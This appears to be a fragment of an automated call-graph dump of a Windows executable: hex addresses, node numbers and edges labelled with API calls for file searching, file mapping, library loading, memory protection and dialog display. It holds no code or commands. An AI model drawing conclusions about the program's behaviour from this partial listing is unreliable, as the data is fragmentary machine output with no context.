7ff64d32f5f8 27296->27297 27412 7ff64d323ad8 27296->27412 27631 7ff64d322c54 27297->27631 27305 7ff64d328d04 33 API calls 27306 7ff64d32f662 27305->27306 27651 7ff64d337918 48 API calls 2 library calls 27306->27651 27308 7ff64d32f677 27309 7ff64d333ec8 55 API calls 27308->27309 27311 7ff64d32f6ad 27309->27311 27316 7ff64d32f74d 27311->27316 27317 7ff64d32f89a 27311->27317 27322 7ff64d333ec8 55 API calls 27311->27322 27652 7ff64d337918 48 API calls 2 library calls 27311->27652 27316->27317 27320 7ff64d32f895 27316->27320 27321 7ff64d32f7cb 27316->27321 27319 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27317->27319 27318 7ff64d32f842 27318->27297 27443 7ff64d3269f8 27318->27443 27454 7ff64d32f930 27318->27454 27323 7ff64d32f8a0 27319->27323 27324 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27320->27324 27422 7ff64d32f8a4 27321->27422 27322->27311 27324->27317 27325->27240 27327 7ff64d3340f9 FindFirstFileW 27326->27327 27328 7ff64d3341d2 FindNextFileW 27326->27328 27331 7ff64d3341f3 27327->27331 27333 7ff64d33411e 27327->27333 27330 7ff64d3341e1 GetLastError 27328->27330 27328->27331 27334 7ff64d3341c0 27330->27334 27332 7ff64d334211 27331->27332 27337 7ff64d3220b0 33 API calls 27331->27337 27341 7ff64d32129c 33 API calls 27332->27341 27335 7ff64d336a0c 49 API calls 27333->27335 27338 7ff64d352320 _handle_error 8 API calls 27334->27338 27336 7ff64d334144 27335->27336 27339 7ff64d334148 FindFirstFileW 27336->27339 27340 7ff64d334167 27336->27340 27337->27332 27342 7ff64d333ef4 27338->27342 27339->27340 27340->27331 27344 7ff64d3341af GetLastError 27340->27344 27351 7ff64d334314 27340->27351 27343 7ff64d33423b 27341->27343 27342->27285 27342->27288 27352 7ff64d338090 27343->27352 27344->27334 27347 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27348 7ff64d33431a 27347->27348 27349 7ff64d33430f 27350 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27349->27350 27350->27351 27351->27347 27353 7ff64d3380a5 27352->27353 27356 7ff64d338188 27353->27356 27355 7ff64d334249 27355->27334 27355->27349 27357 7ff64d338326 27356->27357 27360 7ff64d3381ba 27356->27360 27364 7ff64d32704c 47 API calls memcpy_s 27357->27364 27359 7ff64d33832b 27362 7ff64d3381d4 memcpy_s 27360->27362 27363 7ff64d3358a4 33 API calls 2 library calls 27360->27363 27362->27355 27363->27362 27364->27359 27366 7ff64d32296c 27365->27366 27367 7ff64d3386ec 33 API calls 27366->27367 27368 7ff64d32298d 27367->27368 27369 7ff64d322ac2 27368->27369 27370 7ff64d3521d0 33 API calls 27368->27370 27660 7ff64d334d04 27369->27660 27372 7ff64d322ab0 27370->27372 27372->27369 27653 7ff64d3291c8 27372->27653 27375 7ff64d332ca8 27692 7ff64d3324c0 27375->27692 27377 7ff64d332cc5 27377->27293 27711 7ff64d3328d0 27380->27711 27381 7ff64d323431 memcpy_s 27389 7ff64d32344e 27381->27389 27392 7ff64d323601 27381->27392 27716 7ff64d332bb0 27381->27716 27382 7ff64d323674 27730 7ff64d3228a4 82 API calls 2 library calls 27382->27730 27384 7ff64d3269f8 132 API calls 27386 7ff64d323682 27384->27386 27386->27384 27387 7ff64d32370c 27386->27387 27386->27392 27408 7ff64d332aa0 101 API calls 27386->27408 27387->27392 27393 7ff64d323740 27387->27393 27731 7ff64d3228a4 82 API calls 2 library calls 27387->27731 27389->27382 27389->27386 27390 7ff64d3235cb 27390->27389 27391 7ff64d3235d7 27390->27391 27391->27392 27395 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27391->27395 27392->27296 27393->27392 27394 7ff64d32384d 27393->27394 27407 7ff64d332bb0 101 API calls 27393->27407 27394->27392 27397 7ff64d3220b0 33 API calls 27394->27397 27398 7ff64d323891 27395->27398 27396 7ff64d3234eb 27396->27390 27725 7ff64d332aa0 27396->27725 27397->27392 27398->27296 27399 7ff64d3269f8 132 API calls 27401 7ff64d32378e 27399->27401 27401->27399 27402 7ff64d323803 27401->27402 27410 7ff64d332aa0 101 API calls 27401->27410 27405 7ff64d332aa0 101 API calls 27402->27405 27405->27394 27406 7ff64d3328d0 104 API calls 27406->27396 27407->27401 27408->27386 27409 7ff64d3328d0 104 API calls 27409->27390 27410->27401 27413 7ff64d323af9 27412->27413 27414 7ff64d323b55 27412->27414 27743 7ff64d323378 27413->27743 27416 7ff64d352320 _handle_error 8 API calls 27414->27416 27418 7ff64d323b67 27416->27418 27418->27305 27418->27321 27419 7ff64d323b6c 27420 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27419->27420 27421 7ff64d323b71 27420->27421 27966 7ff64d33886c 27422->27966 27424 7ff64d32f8ba 27970 7ff64d33ef60 GetSystemTime SystemTimeToFileTime 27424->27970 27427 7ff64d340994 27428 7ff64d350340 27427->27428 27429 7ff64d337df4 47 API calls 27428->27429 27430 7ff64d350373 27429->27430 27431 7ff64d33aae0 48 API calls 27430->27431 27432 7ff64d350387 27431->27432 27433 7ff64d33da98 48 API calls 27432->27433 27434 7ff64d350397 27433->27434 27435 7ff64d321fa0 31 API calls 27434->27435 27436 7ff64d3503a2 27435->27436 27979 7ff64d34fc68 49 API calls 2 library calls 27436->27979 27438 7ff64d3503b8 27439 7ff64d321fa0 31 API calls 27438->27439 27444 7ff64d326a0e 27443->27444 27448 7ff64d326a0a 27443->27448 27453 7ff64d332bb0 101 API calls 27444->27453 27445 7ff64d326a1b 27446 7ff64d326a2f 27445->27446 27447 7ff64d326a3e 27445->27447 27446->27448 27980 7ff64d325e24 27446->27980 28042 7ff64d325130 130 API calls 2 library calls 27447->28042 27448->27318 27451 7ff64d326a3c 27451->27448 28043 7ff64d32466c 82 API calls 27451->28043 27453->27445 27455 7ff64d32f978 27454->27455 27460 7ff64d32f9b0 27455->27460 27467 7ff64d32fa34 27455->27467 28158 7ff64d34612c 137 API calls 3 library calls 27455->28158 27456 7ff64d331189 27458 7ff64d3311e1 27456->27458 27459 7ff64d33118e 27456->27459 27458->27467 28207 7ff64d34612c 137 API calls 3 library calls 27458->28207 27459->27467 28206 7ff64d32dd08 179 API calls 27459->28206 27460->27456 27464 7ff64d32f9d0 27460->27464 27460->27467 27461 7ff64d352320 _handle_error 8 API calls 27462 7ff64d3311c4 27461->27462 27462->27318 27464->27467 28073 7ff64d329bb0 27464->28073 27467->27461 27468 7ff64d32fad6 28086 7ff64d335ef8 27468->28086 27632 7ff64d322c88 27631->27632 27633 7ff64d322c74 27631->27633 27634 7ff64d321fa0 31 API calls 27632->27634 27633->27632 28316 7ff64d322d80 108 API calls _invalid_parameter_noinfo_noreturn 27633->28316 27639 7ff64d322ca1 27634->27639 27637 7ff64d322d08 27640 7ff64d323090 31 API calls 27637->27640 27638 7ff64d322d64 27641 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27638->27641 27639->27638 28294 7ff64d323090 27639->28294 27643 7ff64d322d14 27640->27643 27642 7ff64d322d7c 27641->27642 27644 7ff64d321fa0 31 API calls 27643->27644 27645 7ff64d322d20 27644->27645 28302 7ff64d33878c 27645->28302 27651->27308 27652->27311 27670 7ff64d3356a4 27653->27670 27655 7ff64d3291df 27673 7ff64d33b788 27655->27673 27659 7ff64d329383 27659->27369 27661 7ff64d334d32 memcpy_s 27660->27661 27688 7ff64d334bac 27661->27688 27663 7ff64d334d54 27664 7ff64d334d90 27663->27664 27666 7ff64d334dae 27663->27666 27665 7ff64d352320 _handle_error 8 API calls 27664->27665 27667 7ff64d322b32 27665->27667 27668 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27666->27668 27667->27293 27667->27375 27669 7ff64d334db3 27668->27669 27679 7ff64d3356e8 27670->27679 27674 7ff64d3213a4 33 API calls 27673->27674 27675 7ff64d329365 27674->27675 27676 7ff64d329a28 27675->27676 27677 7ff64d3356e8 2 API calls 27676->27677 27678 7ff64d329a36 27677->27678 27678->27659 27680 7ff64d3356fe memcpy_s 27679->27680 27683 7ff64d33eba4 27680->27683 27686 7ff64d33eb58 GetCurrentProcess GetProcessAffinityMask 27683->27686 27687 7ff64d3356de 27686->27687 27687->27655 27689 7ff64d334c27 27688->27689 27691 7ff64d334c2f memcpy_s 27688->27691 27690 7ff64d321fa0 31 API calls 27689->27690 27690->27691 27691->27663 27693 7ff64d3324fd CreateFileW 27692->27693 27695 7ff64d3325ae GetLastError 27693->27695 27699 7ff64d33266e 27693->27699 27696 7ff64d336a0c 49 API calls 27695->27696 27697 7ff64d3325dc 27696->27697 27698 7ff64d3325e0 CreateFileW GetLastError 27697->27698 27704 7ff64d33262c 27697->27704 27698->27704 27701 7ff64d3326b1 SetFileTime 27699->27701 27703 7ff64d3326cf 27699->27703 27700 7ff64d332708 27702 7ff64d352320 _handle_error 8 API calls 27700->27702 27701->27703 27705 7ff64d33271b 27702->27705 27703->27700 27706 7ff64d3220b0 33 API calls 27703->27706 27704->27699 27707 7ff64d332736 27704->27707 27705->27377 27710 7ff64d32b7e8 99 API calls 2 library calls 27705->27710 27706->27700 27708 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27707->27708 27709 7ff64d33273b 27708->27709 27710->27377 27712 7ff64d3328f6 27711->27712 27714 7ff64d3328fd 27711->27714 27712->27381 27713 7ff64d332320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 27713->27714 27714->27712 27714->27713 27732 7ff64d32b8a4 99 API calls std::_Xinvalid_argument 27714->27732 27717 7ff64d332bcd 27716->27717 27718 7ff64d332be9 27716->27718 27719 7ff64d3234cc 27717->27719 27733 7ff64d32b9c4 99 API calls std::_Xinvalid_argument 27717->27733 27718->27719 27721 7ff64d332c01 SetFilePointer 27718->27721 27719->27406 27721->27719 27722 7ff64d332c1e GetLastError 27721->27722 27722->27719 27723 7ff64d332c28 27722->27723 27723->27719 27734 7ff64d32b9c4 99 API calls std::_Xinvalid_argument 27723->27734 27735 7ff64d332778 27725->27735 27728 7ff64d3235a7 27728->27390 27728->27409 27730->27392 27731->27393 27736 7ff64d332789 _snwprintf 27735->27736 27737 7ff64d3327b5 27736->27737 27738 7ff64d332890 SetFilePointer 27736->27738 27739 7ff64d352320 _handle_error 8 API calls 27737->27739 27738->27737 27740 7ff64d3328b8 GetLastError 27738->27740 27741 7ff64d33281d 27739->27741 27740->27737 27741->27728 27742 7ff64d32b9c4 99 API calls std::_Xinvalid_argument 27741->27742 27744 7ff64d323396 27743->27744 27745 7ff64d32339a 27743->27745 27744->27414 27744->27419 27749 7ff64d323294 27745->27749 27748 7ff64d332aa0 101 API calls 27748->27744 27750 7ff64d3232bb 27749->27750 27752 7ff64d3232f6 27749->27752 27751 7ff64d3269f8 132 API calls 27750->27751 27755 7ff64d3232db 27751->27755 27757 7ff64d326e74 27752->27757 27755->27748 27761 7ff64d326e95 27757->27761 27758 7ff64d3269f8 132 API calls 27758->27761 27759 7ff64d32331d 27759->27755 27762 7ff64d323904 27759->27762 27761->27758 27761->27759 27789 7ff64d33e808 27761->27789 27797 7ff64d326a7c 27762->27797 27765 7ff64d32396a 27767 7ff64d323989 27765->27767 27768 7ff64d32399a 27765->27768 27830 7ff64d340d54 33 API calls 27767->27830 27774 7ff64d3239ec 27768->27774 27775 7ff64d3239a3 27768->27775 27769 7ff64d352320 _handle_error 8 API calls 27773 7ff64d323a9e 27769->27773 27770 7ff64d323ab3 27777 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27770->27777 27771 7ff64d323a8a 27771->27769 27773->27755 27832 7ff64d3226b4 33 API calls memcpy_s 27774->27832 27831 7ff64d340c80 33 API calls 27775->27831 27778 7ff64d323ab8 27777->27778 27781 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27778->27781 27779 7ff64d3239b0 27782 7ff64d321fa0 31 API calls 27779->27782 27786 7ff64d3239c0 memcpy_s 27779->27786 27785 7ff64d323abe 27781->27785 27782->27786 27783 7ff64d321fa0 31 API calls 27788 7ff64d32394f 27783->27788 27784 7ff64d323a13 27833 7ff64d340ae8 34 API calls _invalid_parameter_noinfo_noreturn 27784->27833 27786->27783 27788->27770 27788->27771 27788->27778 27790 7ff64d33e811 27789->27790 27791 7ff64d33e82b 27790->27791 27795 7ff64d32b664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27790->27795 27793 7ff64d33e845 SetThreadExecutionState 27791->27793 27796 7ff64d32b664 RtlPcToFileHeader RaiseException std::_Xinvalid_argument 27791->27796 27795->27791 27796->27793 27798 7ff64d326a96 _snwprintf 27797->27798 27799 7ff64d326ae4 27798->27799 27800 7ff64d326ac4 27798->27800 27801 7ff64d326d4d 27799->27801 27805 7ff64d326b0f 27799->27805 27872 7ff64d3228a4 82 API calls 2 library calls 27800->27872 27901 7ff64d3228a4 82 API calls 2 library calls 27801->27901 27804 7ff64d326ad0 27806 7ff64d352320 _handle_error 8 API calls 27804->27806 27805->27804 27834 7ff64d341f94 27805->27834 27807 7ff64d32394b 27806->27807 27807->27765 27807->27788 27829 7ff64d322794 33 API calls __std_swap_ranges_trivially_swappable 27807->27829 27810 7ff64d326b85 27811 7ff64d326c2a 27810->27811 27828 7ff64d326b7b 27810->27828 27878 7ff64d338968 109 API calls 27810->27878 27843 7ff64d334760 27811->27843 27812 7ff64d326b6e 27873 7ff64d3228a4 82 API calls 2 library calls 27812->27873 27813 7ff64d326b80 27813->27810 27874 7ff64d3240b0 27813->27874 27819 7ff64d326c52 27820 7ff64d326cc7 27819->27820 27821 7ff64d326cd1 27819->27821 27847 7ff64d331794 27820->27847 27879 7ff64d341f20 27821->27879 27862 7ff64d341870 27828->27862 27829->27765 27830->27788 27831->27779 27832->27784 27833->27788 27835 7ff64d342056 std::bad_alloc::bad_alloc 27834->27835 27837 7ff64d341fc5 std::bad_alloc::bad_alloc 27834->27837 27902 7ff64d354078 27835->27902 27838 7ff64d354078 std::_Xinvalid_argument 2 API calls 27837->27838 27839 7ff64d34200f std::bad_alloc::bad_alloc 27837->27839 27840 7ff64d326b59 27837->27840 27838->27839 27839->27840 27841 7ff64d354078 std::_Xinvalid_argument 2 API calls 27839->27841 27840->27810 27840->27812 27840->27813 27842 7ff64d3420a9 27841->27842 27844 7ff64d334780 27843->27844 27845 7ff64d33478a 27843->27845 27846 7ff64d3521d0 33 API calls 27844->27846 27845->27819 27846->27845 27848 7ff64d3317be memcpy_s 27847->27848 27863 7ff64d34188e 27862->27863 27865 7ff64d3418a1 27863->27865 27927 7ff64d33e948 27863->27927 27869 7ff64d3418d8 27865->27869 27923 7ff64d35236c 27865->27923 27871 7ff64d341a37 27869->27871 27934 7ff64d33a984 31 API calls _invalid_parameter_noinfo_noreturn 27869->27934 27872->27804 27873->27828 27875 7ff64d3240dd 27874->27875 27877 7ff64d3240d7 memcpy_s 27874->27877 27875->27877 27935 7ff64d324120 33 API calls 2 library calls 27875->27935 27877->27810 27878->27811 27880 7ff64d341f29 27879->27880 27901->27804 27903 7ff64d354097 27902->27903 27904 7ff64d3540b4 RtlPcToFileHeader 27902->27904 27903->27904 27905 7ff64d3540db RaiseException 27904->27905 27906 7ff64d3540cc 27904->27906 27905->27837 27906->27905 27924 7ff64d35239f 27923->27924 27925 7ff64d3523c8 27924->27925 27926 7ff64d341870 108 API calls 27924->27926 27925->27869 27926->27924 27928 7ff64d33ecd8 103 API calls 27927->27928 27929 7ff64d33e95f ReleaseSemaphore 27928->27929 27934->27871 27967 7ff64d338882 27966->27967 27968 7ff64d338892 27966->27968 27973 7ff64d3323f0 27967->27973 27968->27424 27971 7ff64d352320 _handle_error 8 API calls 27970->27971 27972 7ff64d32f7dc 27971->27972 27972->27318 27972->27427 27974 7ff64d33240f 27973->27974 27977 7ff64d332aa0 101 API calls 27974->27977 27975 7ff64d332428 27978 7ff64d332bb0 101 API calls 27975->27978 27976 7ff64d332438 27976->27968 27977->27975 27978->27976 27979->27438 27981 7ff64d325e67 27980->27981 28044 7ff64d3385f0 27981->28044 27983 7ff64d326134 27989 7ff64d326973 27992 7ff64d32612e 27992->27983 27992->27989 27996 7ff64d3385f0 104 API calls 27992->27996 28042->27451 28045 7ff64d33869a 28044->28045 28047 7ff64d338614 28044->28047 28046 7ff64d33867c 28045->28046 28049 7ff64d3240b0 33 API calls 28045->28049 28046->27992 28047->28046 28048 7ff64d3240b0 33 API calls 28047->28048 28050 7ff64d33864d 28048->28050 28051 7ff64d3386b3 28049->28051 28068 7ff64d32a174 28050->28068 28053 7ff64d3328d0 104 API calls 28051->28053 28053->28046 28081 7ff64d329be7 28073->28081 28074 7ff64d329c1b 28075 7ff64d352320 _handle_error 8 API calls 28074->28075 28076 7ff64d329c9d 28075->28076 28076->27468 28078 7ff64d329c83 28079 7ff64d321fa0 31 API calls 28078->28079 28079->28074 28081->28074 28081->28078 28082 7ff64d329cae 28081->28082 28208 7ff64d335294 28081->28208 28226 7ff64d33db60 28081->28226 28083 7ff64d329cbf 28082->28083 28230 7ff64d33da48 CompareStringW 28082->28230 28083->28078 28085 7ff64d3220b0 33 API calls 28083->28085 28085->28078 28099 7ff64d335f3a 28086->28099 28158->27460 28206->27467 28207->27467 28209 7ff64d3352d4 28208->28209 28214 7ff64d335312 __vcrt_InitializeCriticalSectionEx 28209->28214 28220 7ff64d335339 __vcrt_InitializeCriticalSectionEx 28209->28220 28231 7ff64d3413f4 CompareStringW 28209->28231 28210 7ff64d352320 _handle_error 8 API calls 28212 7ff64d335503 28210->28212 28212->28081 28215 7ff64d335382 __vcrt_InitializeCriticalSectionEx 28214->28215 28214->28220 28232 7ff64d3413f4 CompareStringW 28214->28232 28216 7ff64d32129c 33 API calls 28215->28216 28217 7ff64d335439 28215->28217 28215->28220 28218 7ff64d335426 28216->28218 28219 7ff64d33551b 28217->28219 28221 7ff64d335489 28217->28221 28220->28210 28221->28220 28227 7ff64d33db73 28226->28227 28228 7ff64d3220b0 33 API calls 28227->28228 28229 7ff64d33db91 28227->28229 28228->28229 28229->28081 28230->28083 28231->28214 28232->28215 28295 7ff64d321fa0 31 API calls 28294->28295 28296 7ff64d3230a5 28295->28296 28297 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28296->28297 28298 7ff64d3230fd 28297->28298 28299 7ff64d33b825 28298->28299 28300 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28298->28300 28299->27637 28301 7ff64d33b846 28300->28301 28303 7ff64d3387af 28302->28303 28314 7ff64d3387df 28302->28314 28304 7ff64d35236c 108 API calls 28303->28304 28308 7ff64d3387ca 28304->28308 28305 7ff64d33882b 28317 7ff64d33461c 28305->28317 28306 7ff64d35236c 108 API calls 28309 7ff64d338814 28306->28309 28311 7ff64d35236c 108 API calls 28308->28311 28312 7ff64d35236c 108 API calls 28309->28312 28310 7ff64d338845 28313 7ff64d33461c 108 API calls 28310->28313 28311->28314 28312->28305 28315 7ff64d338851 28313->28315 28314->28305 28314->28306 28316->27632 28318 7ff64d334632 28317->28318 28320 7ff64d33463a 28317->28320 28319 7ff64d33e948 108 API calls 28318->28319 28319->28320 28320->28310 28322 7ff64d33163e 28321->28322 28326 7ff64d331681 28321->28326 28325 7ff64d3331bc 51 API calls 28322->28325 28322->28326 28323 7ff64d3316a0 28324 7ff64d32e600 31 API calls 28323->28324 28330 7ff64d3316de 28324->28330 28325->28322 28326->28323 28327 7ff64d321fa0 31 API calls 28326->28327 28327->28326 28328 7ff64d33175b 28331 7ff64d352320 _handle_error 8 API calls 28328->28331 28329 7ff64d33178d 28333 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28329->28333 28330->28328 28330->28329 28332 7ff64d32e58a 28331->28332 28332->27250 28332->27252 28334 7ff64d331792 28333->28334 28336 7ff64d3484cc 4 API calls 28335->28336 28337 7ff64d3484aa 28336->28337 28338 7ff64d3484b9 28337->28338 28347 7ff64d348504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28337->28347 28338->26619 28338->26620 28340->26625 28341->26631 28343 7ff64d3484e3 28342->28343 28344 7ff64d3484de 28342->28344 28343->26631 28348 7ff64d348590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28344->28348 28346->26634 28347->28338 28348->28343 28349->26654 28351->26684 28352->26700 28353->26707 28355->26712 28357 7ff64d351491 28359 7ff64d3513c9 28357->28359 28358 7ff64d351900 _com_raise_error 14 API calls 28358->28359 28359->28358 25859 7ff64d35c438 25860 7ff64d35c44d 25859->25860 25861 7ff64d35c451 25859->25861 25871 7ff64d360730 25861->25871 25866 7ff64d35c463 25869 7ff64d35d90c __free_lconv_mon 15 API calls 25866->25869 25868 7ff64d35c470 25888 7ff64d35d90c 25868->25888 25869->25860 25872 7ff64d36073d 25871->25872 25873 7ff64d35c456 25871->25873 25894 7ff64d360570 48 API calls 5 library calls 25872->25894 25875 7ff64d360b78 GetEnvironmentStringsW 25873->25875 25876 7ff64d360c4a 25875->25876 25877 7ff64d360ba6 WideCharToMultiByte 25875->25877 25880 7ff64d35c45b 25876->25880 25881 7ff64d360c54 FreeEnvironmentStringsW 25876->25881 25877->25876 25879 7ff64d360c00 25877->25879 25895 7ff64d35d94c 25879->25895 25880->25866 25887 7ff64d35c4a4 31 API calls 4 library calls 25880->25887 25881->25880 25884 7ff64d360c37 25886 7ff64d35d90c __free_lconv_mon 15 API calls 25884->25886 25885 7ff64d360c10 WideCharToMultiByte 25885->25884 25886->25876 25887->25868 25889 7ff64d35d941 __free_lconv_mon 25888->25889 25890 7ff64d35d911 RtlRestoreThreadPreferredUILanguages 25888->25890 25889->25866 25890->25889 25891 7ff64d35d92c 25890->25891 25912 7ff64d35d69c 15 API calls abort 25891->25912 25893 7ff64d35d931 GetLastError 25893->25889 25894->25873 25896 7ff64d35d997 25895->25896 25900 7ff64d35d95b abort 25895->25900 25905 7ff64d35d69c 15 API calls abort 25896->25905 25897 7ff64d35d97e RtlAllocateHeap 25899 7ff64d35d995 25897->25899 25897->25900 25899->25884 25899->25885 25900->25896 25900->25897 25902 7ff64d35bbc0 25900->25902 25906 7ff64d35bc00 25902->25906 25905->25899 25911 7ff64d35f398 EnterCriticalSection 25906->25911 25912->25893 25918 7ff64d35154b 25920 7ff64d3514a2 25918->25920 25921 7ff64d351900 25920->25921 25947 7ff64d351558 25921->25947 25924 7ff64d35198b 25925 7ff64d351868 DloadReleaseSectionWriteAccess 6 API calls 25924->25925 25926 7ff64d351998 RaiseException 25925->25926 25927 7ff64d351bb5 25926->25927 25927->25920 25928 7ff64d3519b4 25929 7ff64d351a3d LoadLibraryExA 25928->25929 25930 7ff64d351b85 25928->25930 25931 7ff64d351aa9 25928->25931 25935 7ff64d351abd 25928->25935 25929->25931 25932 7ff64d351a54 GetLastError 25929->25932 25955 7ff64d351868 25930->25955 25933 7ff64d351ab4 FreeLibrary 25931->25933 25931->25935 25936 7ff64d351a69 25932->25936 25937 7ff64d351a7e 25932->25937 25933->25935 25934 7ff64d351b1b GetProcAddress 25934->25930 25939 7ff64d351b30 GetLastError 25934->25939 25935->25930 25935->25934 25936->25931 25936->25937 25938 7ff64d351868 DloadReleaseSectionWriteAccess 6 API calls 25937->25938 25941 7ff64d351a8b RaiseException 25938->25941 25942 7ff64d351b45 25939->25942 25941->25927 25942->25930 25943 7ff64d351868 DloadReleaseSectionWriteAccess 6 API calls 25942->25943 25944 7ff64d351b67 RaiseException 25943->25944 25945 7ff64d351558 _com_raise_error 6 API calls 25944->25945 25946 7ff64d351b81 25945->25946 25946->25930 25948 7ff64d3515d3 25947->25948 25949 7ff64d35156e 25947->25949 25948->25924 25948->25928 25963 7ff64d351604 25949->25963 25952 7ff64d3515ce 25954 7ff64d351604 DloadReleaseSectionWriteAccess 3 API calls 25952->25954 25954->25948 25956 7ff64d351878 25955->25956 25962 7ff64d3518d1 25955->25962 25957 7ff64d351604 DloadReleaseSectionWriteAccess 3 API calls 25956->25957 25958 7ff64d35187d 25957->25958 25959 7ff64d3518cc 25958->25959 25960 7ff64d3517d8 DloadProtectSection 3 API calls 25958->25960 25961 7ff64d351604 DloadReleaseSectionWriteAccess 3 API calls 25959->25961 25960->25959 25961->25962 25962->25927 25964 7ff64d35161f 25963->25964 25966 7ff64d351573 25963->25966 25965 7ff64d351624 GetModuleHandleW 25964->25965 25964->25966 25967 7ff64d351639 25965->25967 25968 7ff64d35163e GetProcAddress 25965->25968 25966->25952 25970 7ff64d3517d8 25966->25970 25967->25966 25968->25967 25969 7ff64d351653 GetProcAddress 25968->25969 25969->25967 25973 7ff64d3517fa DloadProtectSection 25970->25973 25971 7ff64d351802 25971->25952 25972 7ff64d35183a VirtualProtect 25972->25971 25973->25971 25973->25972 25975 7ff64d3516a4 VirtualQuery GetSystemInfo 25973->25975 25975->25972 28392 7ff64d352d6c 28419 7ff64d3527fc 28392->28419 28395 7ff64d352eb8 28519 7ff64d353170 7 API calls 2 library calls 28395->28519 28396 7ff64d352d88 __scrt_acquire_startup_lock 28398 7ff64d352ec2 28396->28398 28399 7ff64d352da6 28396->28399 28520 7ff64d353170 7 API calls 2 library calls 28398->28520 28406 7ff64d352de8 __scrt_release_startup_lock 28399->28406 28425 7ff64d35ce08 28399->28425 28403 7ff64d352dcb 28404 7ff64d352ecd abort 28407 7ff64d352e51 28406->28407 28516 7ff64d35c050 35 API calls __GSHandlerCheck_EH 28406->28516 28433 7ff64d3532bc 28407->28433 28409 7ff64d352e56 28436 7ff64d35cd20 28409->28436 28521 7ff64d352fb0 28419->28521 28422 7ff64d352827 28422->28395 28422->28396 28423 7ff64d35282b __scrt_initialize_crt 28423->28422 28523 7ff64d3551a0 7 API calls 2 library calls 28423->28523 28427 7ff64d35ce20 28425->28427 28426 7ff64d352dc7 28426->28403 28429 7ff64d35cd90 28426->28429 28427->28426 28524 7ff64d352c80 28427->28524 28430 7ff64d35cdeb 28429->28430 28431 7ff64d35cdcc 28429->28431 28430->28406 28431->28430 28599 7ff64d321120 28431->28599 28434 7ff64d353cf0 memcpy_s 28433->28434 28435 7ff64d3532d3 GetStartupInfoW 28434->28435 28435->28409 28437 7ff64d360730 48 API calls 28436->28437 28438 7ff64d35cd2f 28437->28438 28440 7ff64d352e5e 28438->28440 28604 7ff64d360ac0 35 API calls swprintf 28438->28604 28441 7ff64d350754 28440->28441 28605 7ff64d33dfd0 28441->28605 28444 7ff64d3362dc 35 API calls 28445 7ff64d35079a 28444->28445 28682 7ff64d34946c 28445->28682 28447 7ff64d3507a4 memcpy_s 28687 7ff64d349a14 28447->28687 28449 7ff64d350819 28450 7ff64d35096e GetCommandLineW 28449->28450 28498 7ff64d350ddc 28449->28498 28453 7ff64d350980 28450->28453 28491 7ff64d350b42 28450->28491 28451 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28452 7ff64d350de2 28451->28452 28456 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28452->28456 28457 7ff64d32129c 33 API calls 28453->28457 28454 7ff64d336454 34 API calls 28455 7ff64d350b51 28454->28455 28458 7ff64d321fa0 31 API calls 28455->28458 28465 7ff64d350b68 memcpy_s 28455->28465 28471 7ff64d350de8 28456->28471 28460 7ff64d3509a5 28457->28460 28458->28465 28459 7ff64d321fa0 31 API calls 28462 7ff64d350b93 SetEnvironmentVariableW GetLocalTime 28459->28462 28728 7ff64d34cad0 102 API calls 3 library calls 28460->28728 28461 7ff64d351900 _com_raise_error 14 API calls 28461->28471 28464 7ff64d333e28 swprintf 46 API calls 28462->28464 28466 7ff64d350c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28464->28466 28465->28459 28697 7ff64d34b014 LoadBitmapW 28466->28697 28467 7ff64d3509af 28467->28452 28468 7ff64d350adb 28467->28468 28469 7ff64d3509f9 OpenFileMappingW 28467->28469 28478 7ff64d32129c 33 API calls 28468->28478 28472 7ff64d350a19 MapViewOfFile 28469->28472 28473 7ff64d350ad0 CloseHandle 28469->28473 28471->28461 28472->28473 28475 7ff64d350a3f UnmapViewOfFile MapViewOfFile 28472->28475 28473->28491 28475->28473 28479 7ff64d350a71 28475->28479 28477 7ff64d350c75 28721 7ff64d3467b4 28477->28721 28481 7ff64d350b00 28478->28481 28729 7ff64d34a190 33 API calls 2 library calls 28479->28729 28733 7ff64d34fd0c 35 API calls 2 library calls 28481->28733 28485 7ff64d350a81 28730 7ff64d34fd0c 35 API calls 2 library calls 28485->28730 28486 7ff64d3467b4 33 API calls 28489 7ff64d350c87 DialogBoxParamW 28486->28489 28487 7ff64d350b0a 28487->28491 28493 7ff64d350dd7 28487->28493 28499 7ff64d350cd3 28489->28499 28490 7ff64d350a90 28731 7ff64d33b9b4 102 API calls 28490->28731 28491->28454 28496 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 28493->28496 28494 7ff64d350aa5 28732 7ff64d33bb00 102 API calls 28494->28732 28496->28498 28497 7ff64d350ab8 28502 7ff64d350ac7 UnmapViewOfFile 28497->28502 28498->28451 28500 7ff64d350cec 28499->28500 28501 7ff64d350ce6 Sleep 28499->28501 28503 7ff64d350cfa 28500->28503 28734 7ff64d349f4c 49 API calls 2 library calls 28500->28734 28501->28500 28502->28473 28505 7ff64d350d06 DeleteObject 28503->28505 28506 7ff64d350d25 28505->28506 28507 7ff64d350d1f DeleteObject 28505->28507 28508 7ff64d350d5b 28506->28508 28509 7ff64d350d6d 28506->28509 28507->28506 28735 7ff64d34fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28508->28735 28724 7ff64d3494e4 28509->28724 28512 7ff64d350d60 CloseHandle 28512->28509 28516->28407 28519->28398 28520->28404 28522 7ff64d35281e __scrt_dllmain_crt_thread_attach 28521->28522 28522->28422 